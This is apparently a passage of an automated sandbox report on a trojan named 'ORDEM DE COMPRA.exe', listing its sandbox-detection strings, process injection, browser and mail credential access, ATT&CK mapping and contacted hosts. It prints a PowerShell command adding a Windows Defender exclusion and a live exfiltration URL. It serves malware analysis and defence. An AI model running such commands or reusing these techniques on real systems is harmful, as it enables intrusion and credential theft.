Source: Amcache.hve.9.dr | Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.9.dr | Binary or memory string: vmci.syshbin
Source: Amcache.hve.9.dr | Binary or memory string: VMware, Inc.
Source: ORDEM DE COMPRA.exe, 00000000.00000002.2182801768.000001FBD9A26000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Amcache.hve.9.dr | Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.9.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.9.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.9.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr | Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: Amcache.hve.9.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: ORDEM DE COMPRA.exe, 00000000.00000002.2182801768.000001FBD9A26000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWARE
Source: ORDEM DE COMPRA.exe, 00000000.00000002.2182801768.000001FBD9A26000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: Amcache.hve.9.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: ORDEM DE COMPRA.exe, 00000000.00000002.2182801768.000001FBD9A26000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: ORDEM DE COMPRA.exe, 00000000.00000002.2182801768.000001FBD9A26000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware SVGA II
Source: Amcache.hve.9.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.9.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: AddInProcess32.exe, 00000005.00000002.4522243099.00000000011C8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.9.dr | Binary or memory string: vmci.sys
Source: ORDEM DE COMPRA.exe, 00000000.00000002.2182801768.000001FBD9A26000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
Source: Amcache.hve.9.dr | Binary or memory string: vmci.syshbin`
Source: ORDEM DE COMPRA.exe, 00000000.00000002.2182801768.000001FBD9A26000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
Source: Amcache.hve.9.dr | Binary or memory string: \driver\vmci,\driver\pci
Source: ORDEM DE COMPRA.exe, 00000000.00000002.2182801768.000001FBD9A26000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
Source: ORDEM DE COMPRA.exe, 00000000.00000002.2182801768.000001FBD9A26000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: Amcache.hve.9.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.9.dr | Binary or memory string: VMware20,1
Source: Amcache.hve.9.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.9.dr | Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.9.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.9.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.9.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.9.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.9.dr | Binary or memory string: VMware PCI VMCI Bus Device
Source: ORDEM DE COMPRA.exe, 00000000.00000002.2182801768.000001FBD9A26000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: ORDEM DE COMPRA.exe, 00000000.00000002.2182801768.000001FBD9A26000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
Source: Amcache.hve.9.dr | Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.9.dr | Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.9.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.9.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Process queried: DebugPort (2 identical entries)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 5_2_06A6BE28 LdrInitializeThunk,5_2_06A6BE28
Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDEM DE COMPRA.exe" -Force
Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDEM DE COMPRA.exe" -Force
Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000
Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000
Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 422000
Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 424000
Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: FB5008
Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\ORDEM DE COMPRA.exe" -Force
Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Queries volume information: C:\Users\user\Desktop\ORDEM DE COMPRA.exe VolumeInformation
Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\Desktop\ORDEM DE COMPRA.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
Source: Amcache.hve.9.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.9.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.9.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.9.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.9.dr | Binary or memory string: MsMpEng.exe

              Stealing of Sensitive Information

Source: Yara match | File source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4523823205.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ORDEM DE COMPRA.exe PID: 1756, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 6976, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Yara match | File source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ORDEM DE COMPRA.exe PID: 1756, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 6976, type: MEMORYSTR

              Remote Access Functionality

Source: Yara match | File source: 5.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.ORDEM DE COMPRA.exe.1fbe9a3d540.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.ORDEM DE COMPRA.exe.1fbe9a1caf8.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4523823205.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ORDEM DE COMPRA.exe PID: 1756, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 6976, type: MEMORYSTR
MITRE ATT&CK Matrix (one line per tactic; a number printed before a technique is the count the report shows for that technique, techniques without a number had no matching signature)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: 211 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: 21 Disable or Modify Tools; 41 Virtualization/Sandbox Evasion; 211 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 Timestomp; 1 DLL Side-Loading
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 121 Security Software Discovery; 1 Process Discovery; 41 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery; 1 File and Directory Discovery; 13 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 1 Email Collection; 11 Archive Collected Data; 1 Data from Local System; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Behavior Graph ID: 1446502 | Sample: ORDEM DE COMPRA.exe | Startdate: 23/05/2024 | Architecture: WINDOWS | Score: 100
Start node contacts: reallyfreegeoip.org; checkip.dyndns.org; 3 other IPs or domains
Start node signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures
reallyfreegeoip.org: Tries to detect the country of the analysis system (by using the IP)
ORDEM DE COMPRA.exe (1 3) started
  Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Adds a directory exclusion to Windows Defender; 2 other signatures
  Started child processes: AddInProcess32.exe (15 2); powershell.exe (23); WerFault.exe (19 16); 2 other processes
  AddInProcess32.exe contacts: scratchdreams.tk 188.114.97.3, 443, 49700, 49702 CLOUDFLARENETUS European Union; checkip.dyndns.com 132.226.8.169, 49699, 49704, 49709 UTMEMUS United States
  AddInProcess32.exe signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
  powershell.exe signatures: Loading BitLocker PowerShell Module
  powershell.exe started: conhost.exe

Source | Detection | Scanner | Label
ORDEM DE COMPRA.exe | 26% | Virustotal |
ORDEM DE COMPRA.exe | 21% | ReversingLabs | Win64.Trojan.Generic
ORDEM DE COMPRA.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
reallyfreegeoip.org | 2% | Virustotal |
scratchdreams.tk | 18% | Virustotal |
checkip.dyndns.com | 0% | Virustotal |
15.164.165.52.in-addr.arpa | 1% | Virustotal |
checkip.dyndns.org | 0% | Virustotal |
Source | Detection | Scanner | Label
http://checkip.dyndns.org/ | 0% | URL Reputation | safe
http://checkip.dyndns.org/q | 0% | URL Reputation | safe
http://reallyfreegeoip.org | 0% | URL Reputation | safe
https://reallyfreegeoip.org | 0% | URL Reputation | safe
http://upx.sf.net | 0% | URL Reputation | safe
http://checkip.dyndns.org | 0% | URL Reputation | safe
http://www.microsoft. | 0% | URL Reputation | safe
http://checkip.dyndns.com | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://reallyfreegeoip.org/xml/ | 0% | URL Reputation | safe
https://reallyfreegeoip.org/xml/8.46.123.175$ | 0% | Avira URL Cloud | safe
https://reallyfreegeoip.org/xml/8.46.123.175 | 0% | Avira URL Cloud | safe
https://scratchdreams.tk | 100% | Avira URL Cloud | malware
http://www.microsoft.0 | 0% | Avira URL Cloud | safe
https://scratchdreams.tk/_send_.php?TS | 100% | Avira URL Cloud | malware
http://scratchdreams.tk | 100% | Avira URL Cloud | malware
https://scratchdreams.tk/_send_.php?TS | 16% | Virustotal |
http://scratchdreams.tk | 18% | Virustotal |
https://scratchdreams.tk | 18% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
reallyfreegeoip.org | 188.114.97.3 | true | true | | unknown
scratchdreams.tk | 188.114.97.3 | true | false | | unknown
checkip.dyndns.com | 132.226.8.169 | true | false | | unknown
15.164.165.52.in-addr.arpa | unknown | unknown | true | | unknown
checkip.dyndns.org | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://reallyfreegeoip.org/xml/8.46.123.175 | false | Avira URL Cloud: safe | unknown
http://checkip.dyndns.org/ | false | URL Reputation: safe | unknown
https://scratchdreams.tk/_send_.php?TS | false | 16%, Virustotal; Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://reallyfreegeoip.org/xml/8.46.123.175$ | AddInProcess32.exe, 00000005.00000002.4523823205.0000000003216000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000325C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003223000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.00000000031B8000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003230000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.0000000003208000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.microsoft.0 | AddInProcess32.exe, 00000005.00000002.4523823205.000000000318D000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://checkip.dyndns.org/q | ORDEM DE COMPRA.exe, 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://scratchdreams.tk | ORDEM DE COMPRA.exe, 00000000.00000002.2184297961.000001FBE99FC000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4521934440.0000000000402000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.000000000326C000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.4523823205.00000000030B1000.00000004.00000800.00020000.00000000.sdmp | false | 18%, Virustotal; Avira URL Cloud: malware | unknown
